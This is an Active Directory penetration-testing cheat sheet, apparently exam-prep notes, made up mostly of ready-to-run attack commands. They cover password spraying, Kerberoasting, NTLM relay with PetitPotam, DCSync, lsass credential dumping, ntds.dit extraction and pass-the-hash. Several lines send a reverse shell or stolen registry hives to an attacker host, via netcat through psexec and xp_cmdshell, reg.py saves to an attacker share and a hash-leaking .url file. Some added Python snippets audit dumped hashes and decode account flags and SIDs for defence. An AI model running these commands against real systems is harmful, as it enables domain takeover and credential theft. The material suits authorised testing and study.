AD.md

📂 Learning resources

https://www.hackingarticles.in/active-directory-pentesting-lab-setup/

https://twitter.com/hackthebox_eu/status/1529122562038456320?cxt=HHwWgICzhcu3xLgqAAAA

https://tryhackme.com/room/breachingad

https://academy.hackthebox.com/module/details/143

https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md

https://wadcoms.github.io/

https://zer1t0.gitlab.io/posts/attacking_ad/#what-is-active-directory

active-directory-attack-methods

https://www.amazon.com/Pentesting-Active-Directory-Windows-based-Infrastructure/dp/1804611360/ref=cm_cr_arp_d_product_top?link_from_packtlink=yes

a channel with a lot of AD pentest explanations

https://www.youtube.com/channel/UCpoyhjwNIWZmsiKNKpsMAQQ

AD mindmap
https://orange-cyberdefense.github.io/ocd-mindmaps/
https://github.com/Orange-Cyberdefense/ocd-mindmaps
https://postimg.cc/mtz8kCdB from https://www.reddit.com/r/oscp/comments/14uoni4/i_passed_80_points_no_bonus/
https://xmind.app/m/vQuTSG/ (credit:@y0u553f5433d)

DACL abuse

https://www.thehacker.recipes/ad/movement/dacl

Security identifier (SID) and Relative identifier (RID)
https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-identifiers

A vulnerable AD environment for penetration testing practice

https://github.com/Orange-Cyberdefense/GOAD

Offensive PowerShell for red team

https://github.com/samratashok/nishang

📂 Allowed Tools

Be sure to check the restrictions on the use of tools before taking the exam.

  • BloodHound (SharpHoundCheatSheet)
  • SharpHound
  • PowerShell Empire
  • Covenant
  • Powerview
  • Rubeus
  • evil-winrm
  • Responder (Poisoning and spoofing are not allowed in the labs or on the exam.)
    • To run in analyze mode, use the "-A" parameter.
    • To display the hash every time, use the "-v" parameter.
    sudo responder -I tun0 -A -v
  • Crackmapexec => NetExec
  • Mimikatz
WinRM HTTP port 5985, WinRM HTTPS port 5986

📂 Other Tools

  • linWinPwn - Active Directory vulnerability scanner
  • ADMiner - runs Cypher queries against the BloodHound graph database (Neo4j) and generates a web-based report

📂 Flow (WIP)

AD drawio

📂 Commands And Tools

service scan, domain information, check for null sessions, shares

enum4linux-ng

enum4linux-ng -A <target ip> 
# -A all simple enumeration

Enumerating Users

add the target domain to /etc/hosts, if needed

127.0.0.1 localhost
<target domain ip> <Active Directory Domain>

NTLM relay attack

https://en.hackndo.com/ntlm-relay/
https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-efsr
SMB NTLM blocking now supported in Windows Insider

# listening
python3 ntlmrelayx.py --remove-mic --escalate-user <username> -t ldap://<attacker ip> -smb2support  
# launch
python3 PetitPotam.py -d <domain> -u <username> -p <password> <attacker ip> <target ip>

Dumping LDAP

ldapsearch -LLL -x -H ldap://<target ip> -b '' -s base '(objectclass=*)'
# with credential, e.g., domain = test.local
# pay attention to each user's information, for example, the samaccountname
ldapsearch -H ldap://<target ip> -x -W -D "<username>@test.local" -b "dc=<test>,dc=<local>"
ldapsearch -H ldap://<target ip> -x -W -b "dc=<test>,dc=<local>"
# check the dump file's content, e.g., domain_users.json, the value of key "info"
ldapdomaindump -u '<domain>\<username>' -p '<password>' <HOSTNAME or target ip>

other LDAP queries tool

# https://github.com/ropnop/go-windapsearch
./windapsearch -d <domain> --dc <domain controller>

search smb vulnerability

nmap --script "safe or smb-enum-*" -p 445 <target ip>

Read gMSA password (ReadGMSAPassword and AllowedToDelegate rights) (HTB BOX:Intelligence)

git clone https://github.com/micahvandeusen/gMSADumper.git
python3 gMSADumper.py -u <username> -p <password> -d <domain>

enumerate domain usernames

Kerbrute

# 1 enumerate users 
kerbrute_linux_amd64 -t <threads> --dc <domain controller> -d <domain> userenum  ~/Documents/userlist.txt
# 2 valid users
kerbrute userenum -d <domain> --dc <domain controller> ~/Documents/userlist.txt | grep "USERNAME" | cut -f1 -d"@" | cut -f4 -d":" | tr -d "[:blank:]" > /tmp/users.txt
# bruteuser
./kerbrute_linux_amd64 -t <threads> --dc <domain controller> -d <domain> bruteuser ~/Documents/rockyou.txt <username>
# passwordspray
./kerbrute_linux_amd64 -t <threads> --dc <domain controller> -d <domain> passwordspray <userlist> '<password>'
# crackmapexec needs valid credential
crackmapexec smb <target ip> -u <username> -p <password> --users
# bruteforcing the RID (enumerate users)
crackmapexec <protocol> <target ip(s)> -u <username> -p <password> --rid-brute 10000

change password (STATUS_PASSWORD_MUST_CHANGE)

smbpasswd -U <user_name> -r <target ip>

mount Windows shares

mount -t cifs //<target ip>/<folder> <attacker folder> -o username=<username>

get SID

python3 getPac.py -targetUser <target username> <domain>/<username>[:password]

Setspn

Windows command-line tool for enumerating SPNs, built in since Windows Server 2008

# check all the SPN services 
setspn -Q */*

Enter-PSSession

$password = ConvertTo-SecureString "<password>" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ("<username>", $password )
Enter-PSSession -ComputerName <computer_name> -Credential $cred

rubeus asreproast

.\rubeus.exe asreproast

# modify the hash: insert $23 after $krb5asrep so that hashcat mode 18200 accepts it
# $krb5asrep$23$......

.\hashcat.exe -a 0 -m 18200 .\hash .\Pass.txt

📂 BloodHound

‼️ Edges: relationships between nodes, i.e., the direction of an attack path

https://blog.spookysec.net/Enriching-BloodHound-Data/

https://github.com/ShutdownRepo/The-Hacker-Recipes/tree/master/ad/movement/dacl

AddMembers
Addself
ForceChangePassword
GenericAll
WriteDACL
GenericWrite
WriteOwner
AllExtendedRights
SQLAdmin
CanRDP
CanPSRemote (Evil-WinRM, usually at port 5985)

collecting data in Windows

.\SharpHound.exe -c all --zipfilename ad_data

collecting data in Linux

# normal
python3 bloodhound.py -ns <nameserver ip> -d <domain> -c all -u <username> -p <password> --zip
# proxychains
proxychains python3 bloodhound.py -ns <nameserver ip> -d <domain> -c all -u <username> -p <password> --zip --dns-tcp

Cypher (Neo4j's query language) queries

bloodhound-cypher-cheatsheet

https://posts.specterops.io/cypher-queries-in-bloodhound-enterprise-c7221a0d4bb3

# return nodes with direct relationships
MATCH c=(a)-[:CanPSRemote]->(b) RETURN c
# Find SPNs with keywords 
MATCH (u:User) WHERE ANY (x IN u.serviceprincipalnames WHERE toUpper(x) CONTAINS '<search string>') RETURN u
# retrieve computers
MATCH (c:Computer) [WHERE c.operatingsystem CONTAINS "<search string>"] RETURN c
# PowerShell command:Test-Connection -ComputerName <ComputerName> -Count 1 | Select-Object -ExpandProperty IPV4Address
  • GenericAll

Windows

Import-Module .\PowerView.ps1
<# valid credential #>
$SecPassword = ConvertTo-SecureString '<password>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('<domain>\<username>', $SecPassword)
<# fake SPN #>
Set-DomainObject -Credential $Cred -Identity <specific user> -SET @{serviceprincipalname='<service class>/<host>'} -Verbose
<# Kerberoasting #>
.\Rubeus.exe kerberoast /user:<specific user> /nowrap
<# password recovery #>
.\hashcat.exe -a 0 -m 13100 .\hash .\rockyou.txt

steps example

$User = 'VITAMIN\Ted';$Pass = ConvertTo-SecureString 'P@ssword789' -AsPlainText -Force;$Cred = New-Object System.Management.Automation.PSCredential($User, $Pass)

Set-DomainObject -Credential $Cred -Identity administrator -SET @{serviceprincipalname='ANYNAME/test000'}

.\Rubeus.exe kerberoast /user:administrator /nowrap /creduser:VITAMIN\Ted /credpassword:'P@ssword789' /spn:"ANYNAME/test000"

if we can't recover the password

$User = 'VITAMIN\Ted';$Pass = ConvertTo-SecureString 'P@ssword789' -AsPlainText -Force;$Cred = New-Object System.Management.Automation.PSCredential($User, $Pass)
<# change target user's password #>
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

Set-DomainUserPassword -Identity administrator -AccountPassword $UserPassword -Credential $Cred
  • ForceChangePassword
# group member who has permission
Add-ADGroupMember "<groupname>" -Members "<ADAccount>" 
# check whether the user is already in the group
Get-ADGroupMember -Identity "<groupname>"
# start to change password 
$password = ConvertTo-SecureString "<password>" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ("<ADAccount>", $password )
# using same password to change target user's password
Set-ADAccountPassword -Identity "<Target ADAccount>" -Reset -NewPassword $password -Credential $cred
# if access denied, reconnect
gpupdate /force

# we can use Enter-PSSession to connect to target host
$cred = New-Object System.Management.Automation.PSCredential ("<Target ADAccount>", $password )
Enter-PSSession -ComputerName <computer_name> -Credential $cred

📂 PowerView

Import-Module .\PowerView.ps1
# check if loading is successful
Get-Module
# Groups
Get-NetGroup
# member of the target group
Get-NetGroup "Domain Admins" | select member
# Computers
Get-NetComputer -fulldata
# select
Get-NetComputer -fulldata | select operatingsystem
# Users
Get-NetUser
Get-NetUser | select cn
# find AD users
Get-ADUser -Identity <AD account> -Server <domain controller> -Properties *
Get-ADUser -Filter * -Properties * | select Name, SamAccountName, Description
Get-DomainUser -Identity <AD account> -Properties MemberOf, objectsid
# password last set
Get-NetUser -properties name, pwdlastset, logoncount, badpwdcount
# GroupMembers
Get-ADGroupMember -Identity <groupname>
# find some special messages in description
Get-DomainUser -LDAPFilter "Description=*built*" | Select name,Description

Kerberoasting

get user TGS ticket

Get-DomainUser -Identity <AD account> | Get-DomainSPNTicket -Format Hashcat
targetedKerberoast.py -d <domain> -u <username> -p <password> --dc-ip <dc ip>
# john /tmp/hashes --wordlist=rockyou.txt
# hashcat -m 13100 --force -a 0 hashes rockyou.txt   

📂 CrackMapExec

Pwn3d!: domain admin flag

# brute forcing, server may block brute-force attack
crackmapexec <protocol> <target ip> -u <user_list.txt> -p <password_list.txt>
# testing user = password
crackmapexec <protocol> <target ip> -u <user_list.txt> -p <user_list.txt> --no-bruteforce
# bruteforcing the RID (enumerate users)
crackmapexec <protocol> <target ip(s)> -u <username> -p <password> --rid-brute 10000
# check password policy
crackmapexec <protocol> <target ip> --pass-pol
# using existing credentials and users to find more credentials 
crackmapexec <protocol> <target ip> -u /tmp/users.txt -p <password> --continue-on-success
# using low privilege user to enumerate more users
crackmapexec <protocol> <target ip> -u <username> -p <password> --users
# using low privilege user to enumerate more groups
crackmapexec <protocol> <target ip> -u <username> -p <password> --groups
# enumerate logged users on multiple servers
crackmapexec <protocol> <target ip(s)> -u <username> -p <password> --loggedon-users
# enumerate shares on multiple servers
crackmapexec <protocol> <target ip(s)> -u <username> -p <password> --shares
# log on with a local non-domain account
crackmapexec <protocol> <target ip(s)> -u <username> -p <password> --local-auth
# enumerate local user shares
crackmapexec <protocol> <target ip(s)> -u <username> -p <password> --local-auth --shares
# enumerate active sessions
crackmapexec <protocol> <target ip(s)> -u <username> -p <password> --sessions
# list readable share files
crackmapexec <protocol> <target ip(s)> -u <username> -p <password> -M spider_plus
# using NTLM hash (NTDS.dit) to check credentials
# e.g., Administrator:500:aad3b435b51404eeaad3b435b51404ee:a8a3b1fee7718533175de682804c417a:::
crackmapexec smb <target ip(s)> -u <username> -H 'LM:NT'
# crackmapexec smb test.local -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:a8a3b1fee7718533175de682804c417a'
crackmapexec smb <target ip(s)> -u <username> -H 'NTHASH'
# crackmapexec smb test.local -u Administrator -H 'a8a3b1fee7718533175de682804c417a'

# anonymous access
crackmapexec smb <target ip> -u 'anonymous' -p '' --shares   

# Zerologon
crackmapexec smb <target ip> -u <username> -p <password> -M zerologon
# PetitPotam
crackmapexec smb <target ip> -u <username> -p <password> -M petitpotam
# noPAC
crackmapexec smb <target ip> -u <username> -p <password> -M nopac
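The `user:rid:LMhash:NThash:::` lines shown above are the same format secretsdump writes for NTDS.dit. Before anyone cracks such a dump, an audit usually reads it for the cheap findings. The following parser and checks are an added example, not code from these notes or from CrackMapExec/Impacket; every hash in `SAMPLE_DUMP` is constructed sample data (the Administrator line only mirrors the format shown above).

```python
# Added example (not from the original notes): parse secretsdump-style
# "user:rid:LMhash:NThash:::" lines and apply the checks a password audit
# runs before anyone reaches for a cracker. All hashes below are sample
# data constructed for this example.
from collections import defaultdict
from typing import Dict, List, NamedTuple

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash when LM storage is disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty string


class HashEntry(NamedTuple):
    user: str
    rid: int
    lm: str
    nt: str


def parse_dump_line(line: str) -> HashEntry:
    """Parse one 'user:rid:lm:nt:::' line; raise ValueError for banners or junk."""
    fields = line.strip().split(":")
    if len(fields) < 4 or not fields[1].isdigit():
        raise ValueError(f"not a hash line: {line!r}")
    user, rid, lm, nt = fields[0], int(fields[1]), fields[2].lower(), fields[3].lower()
    if len(lm) != 32 or len(nt) != 32:
        raise ValueError(f"bad hash length in {line!r}")
    return HashEntry(user, rid, lm, nt)


def audit(lines: List[str]) -> Dict[str, List[str]]:
    """Return findings keyed by check name.

    lm_hash_present: the account still has an LM hash stored (weak, trivially crackable)
    empty_password:  the NT hash is that of the empty string
    shared_password: several accounts share one NT hash (password reuse)
    skipped:         lines that were not hash records (tool banners and the like)
    """
    findings: Dict[str, List[str]] = {
        "lm_hash_present": [], "empty_password": [], "shared_password": [], "skipped": []
    }
    by_nt: Dict[str, List[str]] = defaultdict(list)
    for line in lines:
        if not line.strip():
            continue
        try:
            entry = parse_dump_line(line)
        except ValueError:
            findings["skipped"].append(line.strip())
            continue
        if entry.lm != EMPTY_LM:
            findings["lm_hash_present"].append(entry.user)
        if entry.nt == EMPTY_NT:
            findings["empty_password"].append(entry.user)
        by_nt[entry.nt].append(entry.user)
    for users in by_nt.values():
        if len(users) > 1:
            findings["shared_password"].append(",".join(users))
    return findings


# Constructed sample output in secretsdump's format (values are not real secrets)
SAMPLE_DUMP = [
    "[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)",
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:a8a3b1fee7718533175de682804c417a:::",
    "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:a8a3b1fee7718533175de682804c417a:::",
    "legacy01:1106:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::",
]

if __name__ == "__main__":
    for check, hits in audit(SAMPLE_DUMP).items():
        print(f"{check}: {hits}")
```

Shared NT hashes are the finding worth acting on first: two accounts with the same hash have the same password, so a service account that shares one with Administrator is effectively a domain admin credential.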

📂 dsquery

Windows

userAccountControl

OID: LDAP Matching Rules

# http://www.selfadsi.org/ads-attributes/user-userAccountControl.htm
# userAccountControl:<LDAP_MATCHING_RULE OID>:=<flags (sum) value>
# inactive accounts (ACCOUNTDISABLE=2)
dsquery * -filter "(userAccountControl:1.2.840.113556.1.4.803:=2)"
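The filter above works because the OID 1.2.840.113556.1.4.803 is the LDAP bitwise-AND matching rule and userAccountControl is a bit field. The snippet below is an added example, not from these notes or from Microsoft: it decodes a userAccountControl value into flag names, builds the same filter for any combination of flags (bitwise-AND, or bitwise-OR via OID 1.2.840.113556.1.4.804), and lists the flags an audit would review on enabled accounts. The flag constants are the documented Microsoft values.

```python
# Added example (not from the original notes): decode a userAccountControl
# value into its flag names and build the matching-rule filter used in the
# dsquery above for any combination of flags. Flag values are the documented
# Microsoft constants; the two OIDs are the LDAP bitwise-AND and bitwise-OR
# matching rules.
from typing import Dict, List

UAC_FLAGS: Dict[str, int] = {
    "SCRIPT": 0x1,
    "ACCOUNTDISABLE": 0x2,
    "HOMEDIR_REQUIRED": 0x8,
    "LOCKOUT": 0x10,
    "PASSWD_NOTREQD": 0x20,
    "PASSWD_CANT_CHANGE": 0x40,
    "ENCRYPTED_TEXT_PWD_ALLOWED": 0x80,
    "TEMP_DUPLICATE_ACCOUNT": 0x100,
    "NORMAL_ACCOUNT": 0x200,
    "INTERDOMAIN_TRUST_ACCOUNT": 0x800,
    "WORKSTATION_TRUST_ACCOUNT": 0x1000,
    "SERVER_TRUST_ACCOUNT": 0x2000,
    "DONT_EXPIRE_PASSWORD": 0x10000,
    "MNS_LOGON_ACCOUNT": 0x20000,
    "SMARTCARD_REQUIRED": 0x40000,
    "TRUSTED_FOR_DELEGATION": 0x80000,
    "NOT_DELEGATED": 0x100000,
    "USE_DES_KEY_ONLY": 0x200000,
    "DONT_REQ_PREAUTH": 0x400000,
    "PASSWORD_EXPIRED": 0x800000,
    "TRUSTED_TO_AUTH_FOR_DELEGATION": 0x1000000,
    "PARTIAL_SECRETS_ACCOUNT": 0x4000000,
}

LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"  # every bit in the mask must be set
LDAP_MATCHING_RULE_BIT_OR = "1.2.840.113556.1.4.804"   # at least one bit in the mask is set

# Flags worth reviewing on any enabled account during an audit
REVIEW_FLAGS = (
    "PASSWD_NOTREQD",             # blank password permitted
    "DONT_REQ_PREAUTH",           # exposed to AS-REP roasting
    "DONT_EXPIRE_PASSWORD",       # password never rotates
    "TRUSTED_FOR_DELEGATION",     # unconstrained delegation
    "USE_DES_KEY_ONLY",           # weak Kerberos encryption type
    "ENCRYPTED_TEXT_PWD_ALLOWED", # reversible encryption
)


def decode_uac(value: int) -> List[str]:
    """Names of every flag set in a userAccountControl value, in bit order."""
    return [name for name, bit in UAC_FLAGS.items() if value & bit]


def uac_filter(*flags: str, any_of: bool = False) -> str:
    """LDAP filter matching accounts with all (default) or any of the given flags."""
    mask = 0
    for name in flags:
        mask |= UAC_FLAGS[name]
    rule = LDAP_MATCHING_RULE_BIT_OR if any_of else LDAP_MATCHING_RULE_BIT_AND
    return f"(userAccountControl:{rule}:={mask})"


def review_findings(value: int) -> List[str]:
    """Review flags present on an enabled account; disabled accounts return nothing."""
    present = decode_uac(value)
    if "ACCOUNTDISABLE" in present:
        return []
    return [name for name in REVIEW_FLAGS if name in present]


if __name__ == "__main__":
    print(decode_uac(66048))                    # NORMAL_ACCOUNT + DONT_EXPIRE_PASSWORD
    print(uac_filter("ACCOUNTDISABLE"))         # the filter from the dsquery above
    print(uac_filter("NORMAL_ACCOUNT", "DONT_REQ_PREAUTH"))
```

The filter string returned by `uac_filter` can be pasted into `dsquery * -filter "..."` or an `ldapsearch` query unchanged; the bitwise-OR variant is useful when you want one query for "disabled or locked out".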

📂 rpcclient

Works when null sessions are enabled on the network. A server may accept a null session but still refuse enumeration because of its permission settings.

# null session
rpcclient -U "" -N <target ip>
# -U username
# -N no password

# If you cannot enumerate, you must provide a valid credential
rpcclient -U <username> --password <password> <target ip> 

rpcclient $> querydominfo
# Domain info
rpcclient $> lookupdomain <domain_name>
# Domain info (include SID)
rpcclient $> querydispinfo
# Query display info (include RID)
rpcclient $> queryuser <RID> or <username>
# Query domain user group 
rpcclient $> queryusergroups <RID>
# Enumerate domain users (include RID)
rpcclient $> enumdomusers
# Enumerate domain groups
rpcclient $> enumdomgroups
# Enumerate alias groups
rpcclient $> enumalsgroups <builtin> or <domain> 
# Enumerate domains
rpcclient $> enumdomains
# Enumerate privileges
rpcclient $> enumprivs
# Get domain password info
rpcclient $> getdompwinfo
# Get user domain password info
rpcclient $> getusrdompwinfo <RID> 
# Enumerate the LSA SIDs
rpcclient $> lsaenumsid
# Lookup SID
rpcclient $> lookupsids <SID>
# Enumerate SIDs privileges
rpcclient $> lsaenumacctrights <SID>
# Enumerate shares
rpcclient $> netshareenum
# Enumerate all shares
rpcclient $> netshareenumall
# Details of share
rpcclient $> netsharegetinfo <sharename>
# Lookup username to RID
rpcclient $> samlookupnames domain <username>
# Lookup RID to username
rpcclient $> samlookuprids domain <RID>
# Query LSA policy
rpcclient $> lsaquery
# Create a new user
rpcclient $> createdomuser <username>
# Set new user's password <level>:USER_INFORMATION_CLASS number e.g., 24 (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-samr/6b0dff90-5ac0-429a-93aa-150334adabf6?redirectedfrom=MSDN)
rpcclient $> setuserinfo2 <username> <level> <password>
# installed and share printers
rpcclient $> enumprinters
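lookupsids, samlookuprids and --rid-brute all work on the same structure: a SID whose last sub-authority is the RID, with the well-known RIDs (500 Administrator, 512 Domain Admins, ...) fixed in every domain. The code below is an added example, not from these notes or from Samba/Impacket; it parses SIDs in textual form and in the binary form held in the LDAP objectSid attribute (the one PowerView's `-Properties objectsid` returns), splits off the RID and names the well-known ones. `SAMPLE_SID_BYTES` is a constructed value, not taken from any real domain.

```python
# Added example (not from the original notes): parse SIDs in the textual
# "S-1-5-21-..." form and in the binary form held in the LDAP objectSid
# attribute, split off the RID, and name the well-known RIDs that
# lookupsids/samlookuprids and --rid-brute return. SAMPLE_SID_BYTES is a
# constructed value, not taken from any real domain.
import struct
from typing import List, Tuple

# Well-known domain-relative RIDs (Microsoft-documented constants)
WELL_KNOWN_RIDS = {
    500: "Administrator",
    501: "Guest",
    502: "krbtgt",
    512: "Domain Admins",
    513: "Domain Users",
    514: "Domain Guests",
    515: "Domain Computers",
    516: "Domain Controllers",
    518: "Schema Admins",
    519: "Enterprise Admins",
    520: "Group Policy Creator Owners",
}


def parse_sid_text(sid: str) -> Tuple[int, int, List[int]]:
    """Split 'S-<revision>-<authority>-<sub1>-...-<subN>' into its components."""
    parts = sid.split("-")
    if len(parts) < 3 or parts[0] != "S":
        raise ValueError(f"not a SID: {sid!r}")
    return int(parts[1]), int(parts[2]), [int(p) for p in parts[3:]]


def sid_from_bytes(raw: bytes) -> str:
    """Decode the binary SID layout: revision (1 byte), sub-authority count (1 byte),
    48-bit big-endian identifier authority, then count little-endian 32-bit sub-authorities."""
    if len(raw) < 8:
        raise ValueError("SID too short")
    revision, count = raw[0], raw[1]
    if len(raw) != 8 + 4 * count:
        raise ValueError(f"length {len(raw)} does not match sub-authority count {count}")
    authority = int.from_bytes(raw[2:8], "big")
    subs = struct.unpack("<%dI" % count, raw[8:])
    return "-".join(["S", str(revision), str(authority), *map(str, subs)])


def split_domain_rid(sid: str) -> Tuple[str, int]:
    """Return (domain SID, RID); the RID is the final sub-authority."""
    revision, authority, subs = parse_sid_text(sid)
    if len(subs) < 2:
        raise ValueError("SID carries no RID")
    domain = "-".join(["S", str(revision), str(authority), *map(str, subs[:-1])])
    return domain, subs[-1]


def describe_rid(rid: int) -> str:
    """Name a well-known RID; RIDs from 1000 upward are objects created after the domain."""
    if rid in WELL_KNOWN_RIDS:
        return WELL_KNOWN_RIDS[rid]
    return "domain-created object" if rid >= 1000 else "other built-in"


# Constructed objectSid bytes for S-1-5-21-1111-2222-3333-500
SAMPLE_SID_BYTES = bytes.fromhex(
    "01"              # revision
    "05"              # five sub-authorities
    "000000000005"    # identifier authority 5 (NT Authority)
    "15000000"        # 21
    "57040000"        # 1111
    "ae080000"        # 2222
    "050d0000"        # 3333
    "f4010000"        # 500 -> the RID
)

if __name__ == "__main__":
    sid = sid_from_bytes(SAMPLE_SID_BYTES)
    domain, rid = split_domain_rid(sid)
    print(sid, domain, rid, describe_rid(rid))
```

Because the well-known RIDs never change, the built-in Administrator can be identified from its SID even after the account has been renamed; that is also why a renamed admin account gives no protection against RID-based enumeration, and why monitoring for bursts of SID-to-name lookups (the RID brute-force pattern) is more useful than renaming.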

📂 Psexec.py

Microsoft PsExec Tool (ADMIN$)

get interactive shell on the Windows host (ADMIN$ or C$ must be writeable)

psexec.py <domain>/<username>:'<password>'@<target ip>
# example
psexec.py punipunidenki.local/administrator:'f!wef23424;'@192.168.9.100 "-e cmd.exe 192.168.9.123 4444" -c ~/Documents/nc.exe
# -c pathname copy the filename for later execution, arguments are passed in the command option

📂 Krbrelayx

# add AD Integrated DNS records
python3 dnstool.py -u '<domain>\<username>' -p <password> <target ip> -a add -r <TARGETRECORD> -d <attacker ip> -t A
# get information in a few minutes 
sudo responder -I tun0 # poisoning and spoofing are not allowed in the labs or on the exam

📂 Extracting

secretsdump.py: extracting the password hash from ntds.dit

# 1
secretsdump.py -ntds /tmp/ntds.dit -system /tmp/SYSTEM local -outputfile /tmp/ADHashes.txt
# 2
impacket-secretsdump <username>:<password>@<domain or IP> -dc-ip <domain controller ip>

getTGT.py: get a Kerberos ticket and use it to access other services

# If running in VirtualBox, disable time synchronization between the virtual machine and the host.
sudo service virtualbox-guest-utils stop
# synchronize with server time
sudo ntpdate <target ip> # sudo apt-get -y install ntpdate
#
getTGT.py -hashes '<LMHASH:NTHASH>' <domain>/<username>
# Kerberos credentials cache
export KRB5CCNAME=<username>@<domain>.ccache
export KRB5CCNAME=<TGT_ccache_file>
# showing Kerberos credentials cache
klist
# login method1
python3 psexec.py -k -no-pass <target>
# login method2
wmiexec.py -k -no-pass <target>

reg.py: remote registry manipulation tool through the MS-RRP (Windows Remote Registry Protocol)

reg.py <domain>/<valid username with domain> -hashes '<LMHASH:NTHASH>' query -keyName <Registry Root Keys>
# Registry Root Keys: HKCR, HKCU, HKLM, HKU, HKCC
  • BACKUP OPERATORS
python smbserver.py -smb2support share /tmp

reg.py "<domain>"/"<backup_operator_username>":"<password>"@"<dc ip>" save -keyName 'HKLM\SAM' -o '\\<attacker ip>\share'
reg.py "<domain>"/"<backup_operator_username>":"<password>"@"<dc ip>" save -keyName 'HKLM\SYSTEM' -o '\\<attacker ip>\share'
reg.py "<domain>"/"<backup_operator_username>":"<password>"@"<dc ip>" save -keyName 'HKLM\SECURITY' -o '\\<attacker ip>\share'

secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL
# find the string below
# $MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:9b5ccb9700e3ed723df08132357ff6a1
secretsdump.py <domain>/'<machine accounts>'@<dc ip> -hashes <LMHASH:NTHASH>
# e.g., secretsdump.py test.com/'DC01$'@192.168.0.100 -hashes :9b5ccb9700e3ed723df08132357ff6a1

If running reg.py times out, we can use the following executable, which needs to be compiled.

BackupOperatorToDA

python smbserver.py -smb2support share /tmp

It requires some time.

# Use the -h parameter to check that our compiled file works
.\BackupOperatorToDA.exe -t \\<TARGET or dc> -u <username> -p <password> -d <domain> -o \\<attacker ip>\share

📂 Group Policy Preferences File (GPP cracking)

Groups.xml

gpp-decrypt <Groups.xml cpassword strings>

📂 Kerberoasting

service logon account with SPN services

# valid domain credentials
python3 GetUserSPNs.py <domain>/<username>:<password> -dc-ip <domain controller ip> 
python3 GetUserSPNs.py <domain>/<username>:<password> -dc-ip <domain controller ip> -request -output <hashfile>
hashcat -a 0 -m 13100 <hashfile> ~/Documents/rockyou.txt       

📂 ASREPRoast

GetNPUsers

python3 GetNPUsers.py <domain>/ -dc-ip <domain controller ip> -usersfile <userlist> -format hashcat -outputfile <hashes> -no-pass
# directly output
python3 GetNPUsers.py <domain>/ -dc-ip <domain controller ip> -usersfile <userlist> -format hashcat -no-pass
python3 GetNPUsers.py <domain>/ -dc-ip <domain controller ip> -format hashcat -outputfile <hashes>
# hashcat -> 18200

Impacket's smbclient.py (a different tool from the Samba smbclient) with Kerberos authentication

python3 getTGT.py <domain>/<username>:<password> -k -dc-ip <domain controller ip>
# -k: use Kerberos authentication.
export KRB5CCNAME=<username>.ccache
python3 smbclient.py -no-pass -k <domain>/<username>@<targetName or ip>

impacket other services

🏷️ MSSQL

python3 mssqlclient.py [[domain/]username[:password]@]<targetName or ip> -k -no-pass
# -k -no-pass: use the credentials in the ccache file for Kerberos authentication

sysadmin or serveradmin roles

EXEC sp_configure 'show advanced options', '1'
RECONFIGURE

EXEC sp_configure 'xp_cmdshell', '1' 
RECONFIGURE

EXEC xp_cmdshell 'C:\Windows\Temp\nc.exe -e cmd.exe <attacker ip> <attacker port>';

📂 Mimikatz

Windows

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Mimikatz.md
https://github.com/gentilkiwi/mimikatz

ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list
  • UAC-bypass

If we are already in the Administrators group but are still unable to run Mimikatz (the error below), UAC is likely the cause.

ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061 non admin

https://github.com/k4sth4/UAC-bypass

  • DCSync
.\mimikatz.exe
privilege::debug
<# already a domain administrator #> 
lsadump::dcsync /domain:<domain> /dc:<domain controller> /user:<specific user>
<# authuser with Replicating Directory Changes and Replicating Directory Changes All permissions #>
lsadump::dcsync /domain:<domain> /dc:<domain controller> /user:<specific user> /authuser:<authuser> /authdomain:<authdomain> /authpassword:<authpassword> /authntlm
<# e.g., lsadump::dcsync /domain:TEST.LOCAL /user:user01 /authuser:vitamin /authdomain:TEST /authpassword:"eRFWE5756872Gn" /authntlm #>
  • Exporting AD member hashes
REM create a snapshot
ntdsutil snapshot "activate instance ntds" create quit quit
REM mount a snapshot
ntdsutil "activate instance ntds" snapshot "mount {GUID}" quit quit
REM copy file
copy C:\$SNAP_{X}_VOLUMEC$\windows\NTDS\ntds.dit c:\users\administrator\desktop\ntds.dit

download ntds.dit to our pc

secretsdump.py -ntds /tmp/ntds.dit -system /tmp/SYSTEM local -outputfile /tmp/ADHashes.txt
  • Dumping tickets
sekurlsa::tickets
  • Dumping credentials from lsass
.\mimikatz.exe "log" "privilege::debug" "sekurlsa::logonpasswords" "exit"
  • Pass the Hash

We can also reuse the same hash.

impacket-psexec "Administrator":@10.10.10.10 -hashes ":8846f7eaee8fb117ad06bdd830b7586c"
# reuse
impacket-psexec "Administrator":@10.10.10.11 -hashes ":8846f7eaee8fb117ad06bdd830b7586c"

📂 URL File Attack

https://www.hackingloops.com/url-file-attack-and-printnightmare/

Name the file so that it starts with "@" or "~" and has the extension "url".

sudo responder -I tun0 -A -v

Upload our payload @test.url to a possible path.

[InternetShortcut]
URL=anything
WorkingDirectory=anything
IconFile=\\<attacker ip>\%USERNAME%.icon
IconIndex=1
